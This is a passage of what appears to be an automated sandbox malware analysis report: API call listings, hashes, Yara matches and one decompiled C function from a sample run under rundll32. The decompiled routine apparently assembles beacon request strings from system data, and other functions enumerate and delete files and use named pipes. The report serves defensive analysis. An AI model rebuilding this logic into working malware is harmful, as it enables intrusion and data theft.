                                              • Part of subcall function 0580A1EA: lstrlen.KERNEL32(00000000,75BCC740,?,00000000,76CC81D0,?,?,0580ACCC,00000000,05D7C310), ref: 0580A215
                                              • Part of subcall function 0580A1EA: lstrlen.KERNEL32(?,?,?,0580ACCC,00000000,05D7C310), ref: 0580A21D
                                              • Part of subcall function 0580A1EA: strcpy.NTDLL ref: 0580A234
                                              • Part of subcall function 0580A1EA: lstrcat.KERNEL32(00000000,?), ref: 0580A23F
                                              • Part of subcall function 0580A1EA: StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 0580A25C
                                            • StrTrimA.SHLWAPI(00000000,058243E8,00000000,05D7C310), ref: 05808387
                                              • Part of subcall function 0581E631: lstrlen.KERNEL32(05D78560,00000000,00000000,76CC81D0,0580ACFB,00000000), ref: 0581E641
                                              • Part of subcall function 0581E631: lstrlen.KERNEL32(?), ref: 0581E649
                                              • Part of subcall function 0581E631: lstrcpy.KERNEL32(00000000,05D78560), ref: 0581E65D
                                              • Part of subcall function 0581E631: lstrcat.KERNEL32(00000000,?), ref: 0581E668
                                            • lstrcpy.KERNEL32(?,?), ref: 058083B0
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 058083BA
                                            • lstrcat.KERNEL32(00000000,?), ref: 058083C5
                                            • lstrcat.KERNEL32(00000000,?), ref: 058083CC
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 058083D7
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 058083F3
                                              • Part of subcall function 0580FEA8: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000), ref: 0580FEF9
                                              • Part of subcall function 0580FEA8: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 0580FF8C
                                            • HeapFree.KERNEL32(00000000,?,00000001,05D7C310,?,?,?), ref: 058084BA
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058084D2
                                            • HeapFree.KERNEL32(00000000,?,00000000,05D7C310), ref: 058084E0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058084EE
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058084F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                            • String ID:
                                            • API String ID: 4032678529-0
                                            • Opcode ID: d375d9cc4a6bcd70e5dfa697c6e5d7afe858c90bbf5c92e4b8a70b5e5f8da80c
                                            • Instruction ID: e721e5b82e9c3877599040462df66b6834d9faf29d85336975559a4975171f03
                                            • Opcode Fuzzy Hash: d375d9cc4a6bcd70e5dfa697c6e5d7afe858c90bbf5c92e4b8a70b5e5f8da80c
                                            • Instruction Fuzzy Hash: BBB18B31214205AFDBA1DFA9DC89E2A7FE9BB48210F049819FD45C72A0CB31E885CF56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F59E2 Relevance: 34.8, APIs: 23, Instructions: 255memorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E049F59E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x49fa018; // 0x6a85f48
				asm("bswap eax");
				_t65 =  *0x49fa014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x49fa010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x49fa00c; // 0x81762942
				asm("bswap eax");
				_t68 =  *0x49fa348; // 0x57d5a8
				_t3 = _t68 + 0x49fb633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x49fa02c,  *0x49fa004, _t63);
				_t71 = E049F3F1E();
				_t72 =  *0x49fa348; // 0x57d5a8
				_t4 = _t72 + 0x49fb673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x49fa348; // 0x57d5a8
					_t8 = _t136 + 0x49fb67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139;
				}
				_t76 = E049F1567(_t142);
				_t141 = __imp__;
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x49fa348; // 0x57d5a8
					_t11 = _t130 + 0x49fb8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x49fa2d8, 0, _a8);
				}
				_t77 = E049F3268();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x49fa348; // 0x57d5a8
					_t15 = _t125 + 0x49fb8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x49fa2d8, 0, _a8);
				}
				_t154 =  *0x49fa3cc; // 0x4f795b0
				_t79 = E049F5D1C(0x49fa00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					HeapFree( *0x49fa2d8, _t160, _a20);
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x49fa2d8, 0, 0x800);
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x49fa2d8, _t160, _v16);
						goto L28;
					}
					E049F3950(GetTickCount());
					_t86 =  *0x49fa3cc; // 0x4f795b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x49fa3cc; // 0x4f795b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x49fa3cc; // 0x4f795b0
					_t156 = E049F3739(1, _t151, _a20,  *_t92);
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						HeapFree( *0x49fa2d8, _t160, _a8);
						goto L27;
					}
					StrTrimA(_t156, 0x49f928c);
					_push(_t156);
					_t98 = E049F3970();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x49fa2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E049F4208( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E049F3F62();
						L24:
						HeapFree( *0x49fa2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E049F388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_v8 = E049F3394(_t165, _a4, _a12, _a16);
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E049F4C73(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E049F43A5(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E049F4C73(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}






















































                                            0x049f59e2
                                            0x049f59e2
                                            0x049f59e2
                                            0x049f59eb
                                            0x049f59f4
                                            0x049f59f6
                                            0x049f59f6
                                            0x049f5a03
                                            0x049f5a0e
                                            0x049f5a11
                                            0x049f5a16
                                            0x049f5a1f
                                            0x049f5a22
                                            0x049f5a27
                                            0x049f5a2a
                                            0x049f5a2f
                                            0x049f5a32
                                            0x049f5a3e
                                            0x049f5a4b
                                            0x049f5a4d
                                            0x049f5a53
                                            0x049f5a58
                                            0x049f5a63
                                            0x049f5a65
                                            0x049f5a68
                                            0x049f5a6e
                                            0x049f5a70
                                            0x049f5a78
                                            0x049f5a83
                                            0x049f5a85
                                            0x049f5a88
                                            0x049f5a88
                                            0x049f5a8a
                                            0x049f5a8f
                                            0x049f5a95
                                            0x049f5a9a
                                            0x049f5a9d
                                            0x049f5aa2
                                            0x049f5aaf
                                            0x049f5ab1
                                            0x049f5ab7
                                            0x049f5ac1
                                            0x049f5ac1
                                            0x049f5ac3
                                            0x049f5ac8
                                            0x049f5acd
                                            0x049f5ad0
                                            0x049f5ad5
                                            0x049f5ae2
                                            0x049f5ae4
                                            0x049f5af2
                                            0x049f5af2
                                            0x049f5af4
                                            0x049f5b02
                                            0x049f5b07
                                            0x049f5b09
                                            0x049f5b0e
                                            0x049f5ccf
                                            0x049f5cd9
                                            0x049f5ce2
                                            0x049f5b14
                                            0x049f5b20
                                            0x049f5b26
                                            0x049f5b2b
                                            0x049f5cc3
                                            0x049f5ccd
                                            0x00000000
                                            0x049f5ccd
                                            0x049f5b37
                                            0x049f5b3c
                                            0x049f5b45
                                            0x049f5b56
                                            0x049f5b5a
                                            0x049f5b63
                                            0x049f5b69
                                            0x049f5b78
                                            0x049f5b7f
                                            0x049f5b88
                                            0x049f5b8e
                                            0x049f5cb7
                                            0x049f5cc1
                                            0x00000000
                                            0x049f5cc1
                                            0x049f5b9a
                                            0x049f5ba0
                                            0x049f5ba1
                                            0x049f5ba6
                                            0x049f5bab
                                            0x049f5cad
                                            0x049f5cb5
                                            0x00000000
                                            0x049f5cb5
                                            0x049f5bb4
                                            0x049f5bbb
                                            0x049f5bc3
                                            0x049f5bc8
                                            0x049f5bd1
                                            0x049f5bdc
                                            0x049f5be1
                                            0x049f5be6
                                            0x049f5ce5
                                            0x049f5c99
                                            0x049f5c99
                                            0x049f5c9e
                                            0x049f5ca9
                                            0x049f5cab
                                            0x00000000
                                            0x049f5cab
                                            0x049f5bf0
                                            0x049f5bf5
                                            0x049f5bfa
                                            0x049f5bff
                                            0x049f5c0f
                                            0x049f5c12
                                            0x049f5c18
                                            0x049f5c1e
                                            0x049f5c24
                                            0x049f5c27
                                            0x049f5c2d
                                            0x049f5c30
                                            0x049f5c35
                                            0x049f5c39
                                            0x049f5c39
                                            0x049f5c45
                                            0x049f5c51
                                            0x049f5c55
                                            0x049f5c57
                                            0x049f5c5c
                                            0x049f5c5e
                                            0x049f5c63
                                            0x049f5c68
                                            0x049f5c75
                                            0x049f5c7d
                                            0x049f5c80
                                            0x049f5c80
                                            0x049f5c5c
                                            0x00000000
                                            0x049f5c47
                                            0x049f5c4b
                                            0x049f5c82
                                            0x049f5c85
                                            0x049f5c8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f5c8e
                                            0x049f5c4d
                                            0x00000000
                                            0x049f5c4d
                                            0x049f5c45

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F59F6
                                            • wsprintfA.USER32 ref: 049F5A46
                                            • wsprintfA.USER32 ref: 049F5A63
                                            • wsprintfA.USER32 ref: 049F5A83
                                            • wsprintfA.USER32 ref: 049F5AAF
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5AC1
                                            • wsprintfA.USER32 ref: 049F5AE2
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5AF2
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F5B20
                                            • GetTickCount.KERNEL32 ref: 049F5B31
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F5B45
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F5B63
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F3739: strcpy.NTDLL ref: 049F3783
                                              • Part of subcall function 049F3739: lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                            • StrTrimA.SHLWAPI(00000000,049F928C,?,04F795B0), ref: 049F5B9A
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F3970: lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                              • Part of subcall function 049F3970: lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            • lstrcpy.KERNEL32(00000000,?), ref: 049F5BBB
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F5BC3
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F5BD1
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 049F5BD7
                                              • Part of subcall function 049F4208: lstrlen.KERNEL32(?,00000000,04F79DA0,00000000,049F2263,04F79FC3,69B25F44,?,?,?,?,69B25F44,00000005,049FA00C,4D283A53,?), ref: 049F420F
                                              • Part of subcall function 049F4208: mbstowcs.NTDLL ref: 049F4238
                                              • Part of subcall function 049F4208: memset.NTDLL ref: 049F424A
                                            • wcstombs.NTDLL ref: 049F5C68
                                              • Part of subcall function 049F3394: SysAllocString.OLEAUT32(?), ref: 049F33CF
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 049F5CA9
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049F5CB5
                                            • HeapFree.KERNEL32(00000000,00000000,?,04F795B0), ref: 049F5CC1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F5CCD
                                            • HeapFree.KERNEL32(00000000,?), ref: 049F5CD9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                            • String ID:
                                            • API String ID: 2543559236-0
                                            • Opcode ID: 909a292c1a8ad951ee9ed1f4452a3985626919716759adb700b2e5e98fd4dc91
                                            • Instruction ID: 5e70fad6015f7bf7e3670d37e1a821f0a755e9ed9fd5831f3a7737d62589cd25
                                            • Opcode Fuzzy Hash: 909a292c1a8ad951ee9ed1f4452a3985626919716759adb700b2e5e98fd4dc91
                                            • Instruction Fuzzy Hash: EF912571A00209AFDB11DFA8DC48E9A3FA9EF49324F158034F909D7261DB39ED51DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058126B5 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32 ref: 058126D1
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058126ED
                                            • GetLastError.KERNEL32 ref: 0581273C
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05812752
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05812766
                                            • GetLastError.KERNEL32 ref: 05812780
                                            • GetLastError.KERNEL32 ref: 058127B3
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058127D1
                                            • lstrlenW.KERNEL32(00000000,?), ref: 058127FD
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05812812
                                            • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 058128E6
                                            • HeapFree.KERNEL32(00000000,?), ref: 058128F5
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0581290A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581291D
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581292F
                                            • RtlExitUserThread.NTDLL(?,?), ref: 05812944
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                            • String ID:
                                            • API String ID: 3853681310-3916222277
                                            • Opcode ID: 383155dd87cb9d3f8db1a530df7b58ad7689d8d9aa697bce21ce114f514568f9
                                            • Instruction ID: 2a9d58ae979da2ac9ca04173bed6cd8896b6a9d8bd28e3167df4a7c191d1cfb2
                                            • Opcode Fuzzy Hash: 383155dd87cb9d3f8db1a530df7b58ad7689d8d9aa697bce21ce114f514568f9
                                            • Instruction Fuzzy Hash: 25812575910209AFDF209FA6DC89EBE7FBDFB09210F008469FD06E3250DA706D858B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05817457 Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0581749E
                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 058174BC
                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 058174E8
                                            • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05817556
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 058175CE
                                            • wsprintfA.USER32 ref: 058175EA
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058175F5
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581760C
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05817698
                                            • wsprintfA.USER32 ref: 058176B3
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058176BE
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 058176D5
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 058176F7
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05817712
                                            • wsprintfA.USER32 ref: 05817729
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 05817734
                                              • Part of subcall function 05803622: lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                              • Part of subcall function 05803622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                              • Part of subcall function 05803622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                              • Part of subcall function 05803622: GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                              • Part of subcall function 05803622: HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581774B
                                            • HeapFree.KERNEL32(00000000,?), ref: 05817777
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                            • String ID:
                                            • API String ID: 3130754786-0
                                            • Opcode ID: 5b41d2d6faf85d5fe549f5ce85e5ba1851943f518a08dab47c923b58de1baed7
                                            • Instruction ID: f49f7e7c87ed4755ccab85b1e2bb9301a78f46d7af39e7c6282737c99fe490cf
                                            • Opcode Fuzzy Hash: 5b41d2d6faf85d5fe549f5ce85e5ba1851943f518a08dab47c923b58de1baed7
                                            • Instruction Fuzzy Hash: F4A119B1900209AFEF209F98DC89DAE7F7DFB08354F108469FD06E3250DA356D849B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580DAD8 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580DAED
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                              • Part of subcall function 05805A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                              • Part of subcall function 05805A14: RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 05805A14: RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805BFC
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0580DB49
                                            • memcpy.NTDLL(00000000,?,00000000), ref: 0580DB5C
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580DB73
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805CA8
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805CBA
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805CD5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0580DB9E
                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 0580DBB6
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580DC10
                                            • lstrlenW.KERNEL32(00000000,?), ref: 0580DC33
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580DC45
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0580DCB9
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DCC9
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0580DCF2
                                            • lstrlenW.KERNEL32(0582A878,?), ref: 0580DD6C
                                            • DeleteFileW.KERNEL32(?,?), ref: 0580DD9A
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DDA8
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580DDC9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                            • String ID:
                                            • API String ID: 72361108-0
                                            • Opcode ID: 76eec16b691676cd3efc6d4997fbb437361f58dee8df3ffe6d80fd9dad4f416e
                                            • Instruction ID: 9701f6bc1149509943d5657fd9bd7f419f1c5227e5d872894df1fb8d33bcb153
                                            • Opcode Fuzzy Hash: 76eec16b691676cd3efc6d4997fbb437361f58dee8df3ffe6d80fd9dad4f416e
                                            • Instruction Fuzzy Hash: A59189B1611219AFDB60EFA5DC89DEA7FBDFF08350B048011FE0AD7250DA74A985CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B526 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 0580B554
                                            • StrChrA.SHLWAPI(?,0000000D), ref: 0580B59A
                                            • StrChrA.SHLWAPI(?,0000000A), ref: 0580B5A7
                                            • StrChrA.SHLWAPI(?,0000007C), ref: 0580B5CE
                                            • StrTrimA.SHLWAPI(?,05824FC4), ref: 0580B5E3
                                            • StrChrA.SHLWAPI(?,0000003D), ref: 0580B5EC
                                            • StrTrimA.SHLWAPI(00000001,05824FC4), ref: 0580B602
                                            • _strupr.NTDLL ref: 0580B609
                                            • StrTrimA.SHLWAPI(?,?), ref: 0580B616
                                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0580B65E
                                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0580B67D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                            • String ID: $;
                                            • API String ID: 4019332941-73438061
                                            • Opcode ID: d5bbb5eabe33047e3c24f1c7af2171ec58e7627ebafd8dd5e33782558790d6a4
                                            • Instruction ID: 7919e4e1f2d355328f5cfc46e375fdd9a331d6620d665c91aeba5e67eed56512
                                            • Opcode Fuzzy Hash: d5bbb5eabe33047e3c24f1c7af2171ec58e7627ebafd8dd5e33782558790d6a4
